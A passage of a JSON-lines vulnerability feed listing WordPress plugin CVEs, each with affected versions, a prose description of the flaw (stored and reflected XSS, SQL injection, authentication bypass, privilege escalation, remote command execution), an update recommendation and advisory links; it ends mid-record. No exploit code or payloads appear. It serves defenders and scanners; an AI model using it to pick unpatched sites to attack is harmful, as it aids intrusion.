{"CVE_ID":"CVE-2024-11752","slug":"eveeno","versionImpact":"1.7","versionEndExcluding":"1.8","description":"The Eveeno plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'eveeno' shortcode in all versions up to, and including, 1.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eveeno\\\/trunk\\\/eveeno.php#L150\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eveeno\\\/trunk\\\/eveeno.php#L150\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3202716%40eveeno&new=3202716%40eveeno&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3202716%40eveeno&new=3202716%40eveeno&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e254f0ba-9008-44e9-bf8f-31c9614d6f64?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e254f0ba-9008-44e9-bf8f-31c9614d6f64?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11294","slug":"memberful-wp","versionImpact":"1.73.9","versionEndExcluding":"1.74.0","description":"The Memberful plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.73.9 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as site members.","recommendation":"Update to version 1.74.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3204895\\\/memberful-wp\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3204895\\\/memberful-wp\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/19ad787d-e027-48f5-8b5f-9263338b4fc3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/19ad787d-e027-48f5-8b5f-9263338b4fc3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9242","slug":"memberful-wp","versionImpact":"1.73.7","versionEndExcluding":"1.73.8","description":"The Memberful \u2013 Membership Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'memberful_buy_subscription_link' and 'memberful_podcasts_link' shortcodes in all versions up to, and including, 1.73.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.73.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e9e30377-2b5a-4b2d-9f19-bae91608fb24?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e9e30377-2b5a-4b2d-9f19-bae91608fb24?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/memberful-wp\\\/tags\\\/1.73.7\\\/src\\\/shortcodes.php#L25\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/memberful-wp\\\/tags\\\/1.73.7\\\/src\\\/shortcodes.php#L25\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/memberful-wp\\\/tags\\\/1.73.7\\\/src\\\/shortcodes.php#L59\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/memberful-wp\\\/tags\\\/1.73.7\\\/src\\\/shortcodes.php#L59\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3161020%40memberful-wp&new=3161020%40memberful-wp&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3161020%40memberful-wp&new=3161020%40memberful-wp&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5605","slug":"url-shortify","versionImpact":"1.7.9","versionEndExcluding":"1.7.9.1","description":"The URL Shortify WordPress plugin through 1.7.8 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 1.7.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9ec03ef0-0c04-4517-b761-df87af722a64\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9ec03ef0-0c04-4517-b761-df87af722a64\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1445","slug":"page-scroll-to-id","versionImpact":"1.7.8","versionEndExcluding":"1.7.9","description":"The Page scroll to id plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 1.7.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.7.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c0d5f034-fd8b-456a-b44a-7d82db3a16a0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c0d5f034-fd8b-456a-b44a-7d82db3a16a0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-scroll-to-id\\\/tags\\\/1.7.8\\\/includes\\\/malihu-pagescroll2id-shortcodes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-scroll-to-id\\\/tags\\\/1.7.8\\\/includes\\\/malihu-pagescroll2id-shortcodes.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-scroll-to-id\\\/tags\\\/1.7.8\\\/includes\\\/malihu-pagescroll2id-shortcodes-php52.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-scroll-to-id\\\/tags\\\/1.7.8\\\/includes\\\/malihu-pagescroll2id-shortcodes-php52.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3035333%40page-scroll-to-id%2Ftrunk&old=3034857%40page-scroll-to-id%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3035333%40page-scroll-to-id%2Ftrunk&old=3034857%40page-scroll-to-id%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2296","slug":"loginizer","versionEndExcluding":"1.7.9","description":"The Loginizer WordPress plugin before 1.7.9 does not escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8126ff73-c0e5-4c1b-ba10-2e51f690521e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8126ff73-c0e5-4c1b-ba10-2e51f690521e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0271","slug":"wp-font-awesome","versionEndExcluding":"1.7.9","description":"The WP Font Awesome WordPress plugin before 1.7.9 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fd7aaf06-4be7-48d6-83a1-cd5cd6c3d9c2\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fd7aaf06-4be7-48d6-83a1-cd5cd6c3d9c2\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5087","slug":"pagelayer","versionImpact":"1.7.7","versionEndExcluding":"1.7.8","description":"The Page Builder: Pagelayer WordPress plugin before 1.7.8 doesn't prevent attackers with author privileges and higher from inserting malicious JavaScript inside a post's header or footer code.","recommendation":"Update to version 1.7.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3b45cc0b-7378-49f3-900e-d0e18cd4b878\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3b45cc0b-7378-49f3-900e-d0e18cd4b878\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4544","slug":"pie-register-social-site","versionImpact":"1.7.7","versionEndExcluding":"1.7.8","description":"The Pie Register - Social Sites Login (Add on) plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 1.7.7. This is due to insufficient verification on the user being supplied during a social login through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email.","recommendation":"Update to version 1.7.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b98179c3-8b32-4d75-9f3f-2367215a740b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b98179c3-8b32-4d75-9f3f-2367215a740b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pie-register\\\/tags\\\/3.8.3.3\\\/pie-register.php#L2959\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pie-register\\\/tags\\\/3.8.3.3\\\/pie-register.php#L2959\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7759","slug":"pwa-for-wp","versionImpact":"1.7.71","versionEndExcluding":"1.7.72","description":"The PWA for WP  WordPress plugin before 1.7.72 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.7.72, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6e495b39-f9ef-45dd-b839-65c71a082f2b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6e495b39-f9ef-45dd-b839-65c71a082f2b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5756","slug":"digital-publications-by-supsystic","versionImpact":"1.7.6","versionEndExcluding":"1.7.7","description":"The Digital Publications by Supsystic plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.7.6. This is due to missing or incorrect nonce validation on the AJAX action handler. This makes it possible for unauthenticated attackers to execute AJAX actions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.7.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2304e4dc-0dc6-4ded-b8e6-8d76d70f63d7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2304e4dc-0dc6-4ded-b8e6-8d76d70f63d7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/digital-publications-by-supsystic\\\/trunk\\\/classes\\\/frame.php#L144\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/digital-publications-by-supsystic\\\/trunk\\\/classes\\\/frame.php#L144\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2221","slug":"wpcom-member","versionImpact":"1.7.6","versionEndExcluding":"1.7.7","description":"The WPCOM Member plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018user_phone\u2019 parameter in all versions up to, and including, 1.7.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.7.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpcom-member\\\/tags\\\/1.7.6\\\/includes\\\/class-sesstion.php#L35\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpcom-member\\\/tags\\\/1.7.6\\\/includes\\\/class-sesstion.php#L35\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3255171\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3255171\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8f491d48-935c-4fd9-a342-44d98c5601b3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8f491d48-935c-4fd9-a342-44d98c5601b3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9226","slug":"landing-page-cat","versionImpact":"1.7.6","versionEndExcluding":"1.7.7","description":"The Landing Page Cat \u2013 Coming Soon Page, Maintenance Page & Squeeze Pages plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.7.6. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.7.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9772aa85-15e6-4254-9e76-e5794d71084b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9772aa85-15e6-4254-9e76-e5794d71084b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/landing-page-cat\\\/tags\\\/1.5.4\\\/includes\\\/subscribers.php#L371\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/landing-page-cat\\\/tags\\\/1.5.4\\\/includes\\\/subscribers.php#L371\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3183651%40landing-page-cat&new=3183651%40landing-page-cat&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3183651%40landing-page-cat&new=3183651%40landing-page-cat&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2797","slug":"official-mailerlite-sign-up-forms","versionImpact":"1.7.6","versionEndExcluding":"1.7.7","description":"The MailerLite \u2013 Signup forms (official) plugin for WordPress is vulnerable to unauthorized plugin setting changes due to a missing capability check on the toggleRolesAndPermissions and editAllowedRolesAndPermissions functions in all versions up to, and including, 1.7.6. This makes it possible for unauthenticated attackers to allow lower level users to modify forms.","recommendation":"Update to version 1.7.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a03b4c19-85fa-47ad-b9ae-b466f8e5ca96?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a03b4c19-85fa-47ad-b9ae-b466f8e5ca96?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/official-mailerlite-sign-up-forms\\\/trunk\\\/src\\\/Admin\\\/Actions.php#L41\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/official-mailerlite-sign-up-forms\\\/trunk\\\/src\\\/Admin\\\/Actions.php#L41\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3070584\\\/official-mailerlite-sign-up-forms\\\/trunk?contextall=1&old=3045803&old_path=%2Fofficial-mailerlite-sign-up-forms%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3070584\\\/official-mailerlite-sign-up-forms\\\/trunk?contextall=1&old=3045803&old_path=%2Fofficial-mailerlite-sign-up-forms%2Ftrunk\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-51547","slug":"fluent-support","versionEndExcluding":"1.7.7","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WPManageNinja LLC Fluent Support \u2013 WordPress Helpdesk and Customer Support Ticket Plugin.This issue affects Fluent Support \u2013 WordPress Helpdesk and Customer Support Ticket Plugin: from n\/a through 1.7.6.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/fluent-support\\\/wordpress-fluent-support-plugin-1-7-6-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/fluent-support\\\/wordpress-fluent-support-plugin-1-7-6-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1386","slug":"official-mailerlite-sign-up-forms","versionImpact":"1.7.6","versionEndExcluding":"1.7.7","description":"The MailerLite \u2013 Signup forms (official) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in versions 1.5.0 to 1.7.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.7.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7f34f4a6-9092-4e67-8a1e-7c60edde0b2a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7f34f4a6-9092-4e67-8a1e-7c60edde0b2a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/official-mailerlite-sign-up-forms\\\/tags\\\/1.7.3\\\/src\\\/Views\\\/InvalidForm.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/official-mailerlite-sign-up-forms\\\/tags\\\/1.7.3\\\/src\\\/Views\\\/InvalidForm.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3070584%40official-mailerlite-sign-up-forms%2Ftrunk&old=3045803%40official-mailerlite-sign-up-forms%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3070584%40official-mailerlite-sign-up-forms%2Ftrunk&old=3045803%40official-mailerlite-sign-up-forms%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4687","slug":"pagelayer","versionImpact":"1.7.6","versionEndExcluding":"1.7.7","description":"The Page Builder: Pagelayer WordPress plugin before 1.7.7 doesn't prevent unauthenticated attackers from updating a post's header or footer code on scheduled posts.","recommendation":"Update to version 1.7.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/31596fc5-4203-40c4-9b0a-e8a37faafddd\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/31596fc5-4203-40c4-9b0a-e8a37faafddd\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4757","slug":"list-pages-shortcode","versionEndExcluding":"1.7.6","description":"The List Pages Shortcode WordPress plugin before 1.7.6 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/30211ffd-8751-4354-96d3-69b0106100b1\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/30211ffd-8751-4354-96d3-69b0106100b1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4294","slug":"url-shortify","versionEndExcluding":"1.7.6","description":"The URL Shortify WordPress plugin before 1.7.6 does not properly escape the value of the referer header, thus allowing an unauthenticated attacker to inject malicious javascript that will trigger in the plugins admin panel with statistics of the created short link.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1fc71fc7-861a-46cc-a147-1c7ece9a7776\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1fc71fc7-861a-46cc-a147-1c7ece9a7776\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4819","slug":"shared-files","versionImpact":"1.7.5","versionEndExcluding":"1.7.6","description":"The Shared Files WordPress plugin before 1.7.6 does not return the right Content-Type header for the specified uploaded file. Therefore, an attacker can upload an allowed file extension injected with malicious scripts.","recommendation":"Update to version 1.7.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4423b023-cf4a-46cb-b314-7a09ac08b29a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4423b023-cf4a-46cb-b314-7a09ac08b29a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1475","slug":"wpcom-member","versionImpact":"1.7.5","versionEndExcluding":"1.7.6","description":"The WPCOM Member plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 1.7.5. This is due to insufficient verification on the 'user_phone' parameter when logging in. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if SMS login is enabled.","recommendation":"Update to version 1.7.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpcom-member\\\/tags\\\/1.7.1\\\/includes\\\/form-validation.php#L110\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpcom-member\\\/tags\\\/1.7.1\\\/includes\\\/form-validation.php#L110\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3248208\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3248208\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05178bf3-3040-41aa-ba43-779376d30298?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05178bf3-3040-41aa-ba43-779376d30298?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-2441","slug":"imagemagick-engine","versionImpact":"1.7.5","versionEndExcluding":"1.7.6","description":"The ImageMagick Engine plugin for WordPress is vulnerable to remote code execution via the 'cli_path' parameter in versions up to, and including 1.7.5. This makes it possible for unauthenticated users to run arbitrary commands leading to remote command execution, granted they can trick a site administrator into performing an action such as clicking on a link. This makes it possible for an attacker to create and or modify files hosted on the server which can easily grant attackers backdoor access to the affected server.","recommendation":"Update to version 1.7.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/orangelabweb\\\/imagemagick-engine\\\/blob\\\/v.1.7.2\\\/imagemagick-engine.php#L529\",\"name\":\"https:\\\/\\\/github.com\\\/orangelabweb\\\/imagemagick-engine\\\/blob\\\/v.1.7.2\\\/imagemagick-engine.php#L529\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.exploit-db.com\\\/exploits\\\/51025\",\"name\":\"https:\\\/\\\/www.exploit-db.com\\\/exploits\\\/51025\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/orangelabweb\\\/imagemagick-engine\\\/blob\\\/1.7.4\\\/imagemagick-engine.php#L529\",\"name\":\"https:\\\/\\\/github.com\\\/orangelabweb\\\/imagemagick-engine\\\/blob\\\/1.7.4\\\/imagemagick-engine.php#L529\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/vulnerability-advisories-continued\\\/#CVE-2022-2441\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/vulnerability-advisories-continued\\\/#CVE-2022-2441\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2801283%40imagemagick-engine%2Ftrunk&old=2732430%40imagemagick-engine%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2801283%40imagemagick-engine%2Ftrunk&old=2732430%40imagemagick-engine%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1f17a83-1df0-44fe-bd86-243cff6ec91b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1f17a83-1df0-44fe-bd86-243cff6ec91b?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6482","slug":"login-with-phone-number","versionImpact":"1.7.49","versionEndExcluding":"1.7.50","description":"The Login with phone number plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 1.7.49. This is due to a lack of validation and missing capability check on user-supplied data in the 'lwp_update_password_action' function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update their role to any other role, including Administrator. The vulnerability was partially patched in version 1.7.40. The login with phone number pro plugin was required to exploit the vulnerability in versions 1.7.40 - 1.7.49.","recommendation":"Update to version 1.7.50, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de7cde2c-142c-4004-9302-be335265d87d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de7cde2c-142c-4004-9302-be335265d87d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/login-with-phone-number\\\/trunk\\\/login-with-phonenumber.php#L3803\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/login-with-phone-number\\\/trunk\\\/login-with-phonenumber.php#L3803\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3129185\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3129185\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12422","slug":"import-eventbrite-events","versionImpact":"1.7.4","versionEndExcluding":"1.7.5","description":"The Import Eventbrite Events plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 1.7.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.7.5, or a newer patched 